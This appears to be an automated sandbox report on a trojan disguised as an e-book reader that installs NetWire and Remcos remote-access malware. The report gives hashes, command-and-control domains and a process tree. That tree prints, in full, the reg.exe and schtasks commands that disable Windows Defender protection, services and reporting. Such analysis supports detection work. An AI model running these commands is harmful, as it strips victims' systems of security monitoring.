netwire | daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4

Analysis

max time kernel
149s
max time network
149s
platform
windows7_x64
resource
win7v20201028
submitted
12-11-2020 14:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
Size

15.0MB
MD5

59a413614e91e86b933a42e4abdf1d43
SHA1

2d4ae51600e384dfcc8c054ff8c798055d008f87
SHA256

daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4
SHA512

1e771d3c37f9035f4a813e062c9327bc1a14e34a29aee4bced9613555bb684c581cf121a83f5daa0e4a7e1ac2b430c34b3f190171d4f8a50f4f89bfdb8b6a93c

Score

10^/10

netwire remcos botnet evasion persistence rat stealer trojan

Malware Config

Extracted

Family

remcos

roxy.dynalias.net:3297

regiskm67.buyshouses.net:3297

dico.is-a-liberal.com:3297

neverdiemosole.is-a-doctor.com:3297

zeusnodie.mypets.ws:3297

nvdiedicobies.is-a-hard-worker.com:3297

nvdieroxy.kicks-ass.net:3297

nvdiedicozeuse.webhop.org:3297

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

NetWire RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/412-68-0x0000000000400000-0x0000000000425000-memory.dmp	netwire
behavioral1/memory/412-69-0x0000000000402570-mapping.dmp	netwire
behavioral1/memory/412-71-0x0000000000400000-0x0000000000425000-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Executes dropped EXE 3 IoCs

Processes:

EbookReaderMui.exeEbookRplg.exeEbookNplg.exe

pid process

1564 EbookReaderMui.exe
2044 EbookRplg.exe
1816 EbookNplg.exe

pid	process
1564	EbookReaderMui.exe
2044	EbookRplg.exe
1816	EbookNplg.exe

Drops startup file 4 IoCs

Processes:

EbookRplg.exeEbookNplg.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\installui.exe	EbookRplg.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\installui.exe	EbookRplg.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InstallMui.exe	EbookNplg.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InstallMui.exe	EbookNplg.exe

Loads dropped DLL 11 IoCs

Processes:

daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe

pid	process
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe

Modifies service 2 TTPs 9 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter	reg.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

EbookRplg.exeEbookNplg.exe

description	pid	process	target process
PID 2044 set thread context of 988	2044	EbookRplg.exe	RegAsm.exe
PID 1816 set thread context of 412	1816	EbookNplg.exe	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

EbookNplg.exeEbookRplg.exe

pid	process
1816	EbookNplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

AcroRd32.exeRegAsm.exe

pid process

1684 AcroRd32.exe
988 RegAsm.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

EbookNplg.exeEbookRplg.exe

description pid process

Token: SeDebugPrivilege 1816 EbookNplg.exe
Token: SeDebugPrivilege 2044 EbookRplg.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

AcroRd32.exeRegAsm.exe

pid process

1684 AcroRd32.exe
1684 AcroRd32.exe
1684 AcroRd32.exe
988 RegAsm.exe

pid	process
1684	AcroRd32.exe
988	RegAsm.exe

description	pid	process
Token: SeDebugPrivilege	1816	EbookNplg.exe
Token: SeDebugPrivilege	2044	EbookRplg.exe

pid	process
1684	AcroRd32.exe
1684	AcroRd32.exe
1684	AcroRd32.exe
988	RegAsm.exe

Suspicious use of WriteProcessMemory 141 IoCs

Processes:

daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exeEbookReaderMui.execmd.exe

description	pid	process	target process
PID 1924 wrote to memory of 1564	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookReaderMui.exe
PID 1924 wrote to memory of 1564	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookReaderMui.exe
PID 1924 wrote to memory of 1564	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookReaderMui.exe
PID 1924 wrote to memory of 1564	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookReaderMui.exe
PID 1924 wrote to memory of 2044	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookRplg.exe
PID 1924 wrote to memory of 2044	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookRplg.exe
PID 1924 wrote to memory of 2044	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookRplg.exe
PID 1924 wrote to memory of 2044	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookRplg.exe
PID 1924 wrote to memory of 1816	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookNplg.exe
PID 1924 wrote to memory of 1816	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookNplg.exe
PID 1924 wrote to memory of 1816	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookNplg.exe
PID 1924 wrote to memory of 1816	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookNplg.exe
PID 1924 wrote to memory of 1816	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookNplg.exe
PID 1924 wrote to memory of 1816	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookNplg.exe
PID 1924 wrote to memory of 1816	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookNplg.exe
PID 1564 wrote to memory of 1732	1564	EbookReaderMui.exe	cmd.exe
PID 1564 wrote to memory of 1732	1564	EbookReaderMui.exe	cmd.exe
PID 1564 wrote to memory of 1732	1564	EbookReaderMui.exe	cmd.exe
PID 1564 wrote to memory of 1732	1564	EbookReaderMui.exe	cmd.exe
PID 1732 wrote to memory of 1712	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1712	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1712	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 108	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 108	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 108	1732	cmd.exe	reg.exe
PID 1924 wrote to memory of 1684	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	AcroRd32.exe
PID 1924 wrote to memory of 1684	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	AcroRd32.exe
PID 1924 wrote to memory of 1684	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	AcroRd32.exe
PID 1924 wrote to memory of 1684	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	AcroRd32.exe
PID 1732 wrote to memory of 1648	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1648	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1648	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1676	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1676	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1676	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 324	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 324	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 324	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 744	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 744	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 744	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1756	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1756	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1756	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 748	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 748	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 748	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1088	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1088	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1088	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1896	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1896	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1896	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1844	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1844	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1844	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1400	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1400	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 1400	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 920	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 920	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 920	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 360	1732	cmd.exe	reg.exe
PID 1732 wrote to memory of 360	1732	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
"C:\Users\Admin\AppData\Local\Temp\daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1924
- C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe
  "C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\12E5.tmp\12E6.tmp\12E7.bat C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1732
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:1712
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:108
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      PID:1648
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      PID:1676
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:324
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:744
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:1756
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:748
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      PID:1088
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      PID:1896
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      4⤵
      PID:1844
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      PID:1400
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      PID:920
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:360
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:572
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      PID:1464
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:316
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:616
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:736
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:520
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      PID:540
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      PID:676
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:1748
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:1612
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:1904
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies service
      PID:1064
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies service
      PID:1600
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies service
      PID:1704
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies service
      PID:1432
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies security service
      Modifies service
      PID:1964
- C:\Users\Admin\AppData\Roaming\EbookRplg.exe
  "C:\Users\Admin\AppData\Roaming\EbookRplg.exe"
  2⤵
  - Executes dropped EXE
  - Drops startup file
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2044
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:988
- C:\Users\Admin\AppData\Roaming\EbookNplg.exe
  "C:\Users\Admin\AppData\Roaming\EbookNplg.exe"
  2⤵
  - Executes dropped EXE
  - Drops startup file
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1816
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:412
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Games-Aktuell-05-2020.pdf"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:1684

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\12E5.tmp\12E6.tmp\12E7.bat

MD5
665f21a9b6730aa08e62473e481b8c55

SHA1
717d52e75ac16bf032299828dd61c86af281eb43

SHA256
dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579

SHA512
b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e

Download Submit
C:\Users\Admin\AppData\Roaming\EbookNplg.exe

MD5
34a185bb131df034d21df734a479818d

SHA1
46e8c775b5224e78769753c70731e7e2ad6022f2

SHA256
bbcbeba25ea1bcfd23d53bc391babb4a6dc6f4e2d57f2b8d468fe321560e6e11

SHA512
eccbda45841b2ddcea86192150cc0fc01129c81e838b4e6a4c379a29fded8fb0b04292b0fe58d398dec3ed5476dfb40111e05c9a9e7153f3348d3e57c01bdc41

Download Submit
C:\Users\Admin\AppData\Roaming\EbookNplg.exe

MD5
34a185bb131df034d21df734a479818d

SHA1
46e8c775b5224e78769753c70731e7e2ad6022f2

SHA256
bbcbeba25ea1bcfd23d53bc391babb4a6dc6f4e2d57f2b8d468fe321560e6e11

SHA512
eccbda45841b2ddcea86192150cc0fc01129c81e838b4e6a4c379a29fded8fb0b04292b0fe58d398dec3ed5476dfb40111e05c9a9e7153f3348d3e57c01bdc41

Download Submit
C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe

MD5
9684ab1ebcc8844fbbffd54b3b8e5db1

SHA1
1fbbca3f9e063ce98cde453e1b820e056a524771

SHA256
c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec

SHA512
b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df

Download Submit
C:\Users\Admin\AppData\Roaming\EbookRplg.exe

MD5
27a3654950322a5d1d601ebd25a3dfa2

SHA1
021b03d043ef146920a137550bb731c545061c6a

SHA256
876a1acaeaf0c6db33ea73468c7599e631b6614f8c20e7012cfbd70204341d4b

SHA512
76a6faca17a438a524d8c7562e07e6920d5dec6ac116132916ed363a098a4d52b72b7cdf912880cca4fd7825caa6a60a324a2dc31b9c704c79beee560c7c95c3

Download Submit
C:\Users\Admin\AppData\Roaming\EbookRplg.exe

MD5
27a3654950322a5d1d601ebd25a3dfa2

SHA1
021b03d043ef146920a137550bb731c545061c6a

SHA256
876a1acaeaf0c6db33ea73468c7599e631b6614f8c20e7012cfbd70204341d4b

SHA512
76a6faca17a438a524d8c7562e07e6920d5dec6ac116132916ed363a098a4d52b72b7cdf912880cca4fd7825caa6a60a324a2dc31b9c704c79beee560c7c95c3

Download Submit
C:\Users\Admin\AppData\Roaming\Games-Aktuell-05-2020.pdf

MD5
fba5105a8c3d44d986eccd5f50afa10c

SHA1
96c6ca621f300db6f5b0c031427706ed3600ee43

SHA256
a20407d4bf88efde6f231a7d0b1e5d8797b7a4b2f2f77fbc779eaf922649b37c

SHA512
f85288408d0a9b14102ac82615cb9f8aa852abab992116fdfbf13695a9028f6c37d0be29aeea0f6df430cb01f084ab8dd3416ec24e1276811dc9143119c57130

Download Submit
\Users\Admin\AppData\Roaming\EbookNplg.exe

MD5
34a185bb131df034d21df734a479818d

SHA1
46e8c775b5224e78769753c70731e7e2ad6022f2

SHA256
bbcbeba25ea1bcfd23d53bc391babb4a6dc6f4e2d57f2b8d468fe321560e6e11

SHA512
eccbda45841b2ddcea86192150cc0fc01129c81e838b4e6a4c379a29fded8fb0b04292b0fe58d398dec3ed5476dfb40111e05c9a9e7153f3348d3e57c01bdc41

Download Submit
\Users\Admin\AppData\Roaming\EbookNplg.exe

MD5
34a185bb131df034d21df734a479818d

SHA1
46e8c775b5224e78769753c70731e7e2ad6022f2

SHA256
bbcbeba25ea1bcfd23d53bc391babb4a6dc6f4e2d57f2b8d468fe321560e6e11

SHA512
eccbda45841b2ddcea86192150cc0fc01129c81e838b4e6a4c379a29fded8fb0b04292b0fe58d398dec3ed5476dfb40111e05c9a9e7153f3348d3e57c01bdc41

Download Submit
\Users\Admin\AppData\Roaming\EbookNplg.exe

MD5
34a185bb131df034d21df734a479818d

SHA1
46e8c775b5224e78769753c70731e7e2ad6022f2

SHA256
bbcbeba25ea1bcfd23d53bc391babb4a6dc6f4e2d57f2b8d468fe321560e6e11

SHA512
eccbda45841b2ddcea86192150cc0fc01129c81e838b4e6a4c379a29fded8fb0b04292b0fe58d398dec3ed5476dfb40111e05c9a9e7153f3348d3e57c01bdc41

Download Submit
\Users\Admin\AppData\Roaming\EbookNplg.exe

MD5
34a185bb131df034d21df734a479818d

SHA1
46e8c775b5224e78769753c70731e7e2ad6022f2

SHA256
bbcbeba25ea1bcfd23d53bc391babb4a6dc6f4e2d57f2b8d468fe321560e6e11

SHA512
eccbda45841b2ddcea86192150cc0fc01129c81e838b4e6a4c379a29fded8fb0b04292b0fe58d398dec3ed5476dfb40111e05c9a9e7153f3348d3e57c01bdc41

Download Submit
\Users\Admin\AppData\Roaming\EbookReaderMui.exe

MD5
9684ab1ebcc8844fbbffd54b3b8e5db1

SHA1
1fbbca3f9e063ce98cde453e1b820e056a524771

SHA256
c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec

SHA512
b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df

Download Submit
\Users\Admin\AppData\Roaming\EbookReaderMui.exe

MD5
9684ab1ebcc8844fbbffd54b3b8e5db1

SHA1
1fbbca3f9e063ce98cde453e1b820e056a524771

SHA256
c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec

SHA512
b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df

Download Submit
\Users\Admin\AppData\Roaming\EbookReaderMui.exe

MD5
9684ab1ebcc8844fbbffd54b3b8e5db1

SHA1
1fbbca3f9e063ce98cde453e1b820e056a524771

SHA256
c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec

SHA512
b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df

Download Submit
\Users\Admin\AppData\Roaming\EbookRplg.exe

MD5
27a3654950322a5d1d601ebd25a3dfa2

SHA1
021b03d043ef146920a137550bb731c545061c6a

SHA256
876a1acaeaf0c6db33ea73468c7599e631b6614f8c20e7012cfbd70204341d4b

SHA512
76a6faca17a438a524d8c7562e07e6920d5dec6ac116132916ed363a098a4d52b72b7cdf912880cca4fd7825caa6a60a324a2dc31b9c704c79beee560c7c95c3

Download Submit
\Users\Admin\AppData\Roaming\EbookRplg.exe

MD5
27a3654950322a5d1d601ebd25a3dfa2

SHA1
021b03d043ef146920a137550bb731c545061c6a

SHA256
876a1acaeaf0c6db33ea73468c7599e631b6614f8c20e7012cfbd70204341d4b

SHA512
76a6faca17a438a524d8c7562e07e6920d5dec6ac116132916ed363a098a4d52b72b7cdf912880cca4fd7825caa6a60a324a2dc31b9c704c79beee560c7c95c3

Download Submit
\Users\Admin\AppData\Roaming\EbookRplg.exe

MD5
27a3654950322a5d1d601ebd25a3dfa2

SHA1
021b03d043ef146920a137550bb731c545061c6a

SHA256
876a1acaeaf0c6db33ea73468c7599e631b6614f8c20e7012cfbd70204341d4b

SHA512
76a6faca17a438a524d8c7562e07e6920d5dec6ac116132916ed363a098a4d52b72b7cdf912880cca4fd7825caa6a60a324a2dc31b9c704c79beee560c7c95c3

Download Submit
\Users\Admin\AppData\Roaming\EbookRplg.exe

MD5
27a3654950322a5d1d601ebd25a3dfa2

SHA1
021b03d043ef146920a137550bb731c545061c6a

SHA256
876a1acaeaf0c6db33ea73468c7599e631b6614f8c20e7012cfbd70204341d4b

SHA512
76a6faca17a438a524d8c7562e07e6920d5dec6ac116132916ed363a098a4d52b72b7cdf912880cca4fd7825caa6a60a324a2dc31b9c704c79beee560c7c95c3

Download Submit
memory/108-24-0x0000000000000000-mapping.dmp

Download
memory/316-40-0x0000000000000000-mapping.dmp

Download
memory/324-28-0x0000000000000000-mapping.dmp

Download
memory/360-37-0x0000000000000000-mapping.dmp

Download
memory/412-71-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/412-69-0x0000000000402570-mapping.dmp

Download
memory/412-68-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
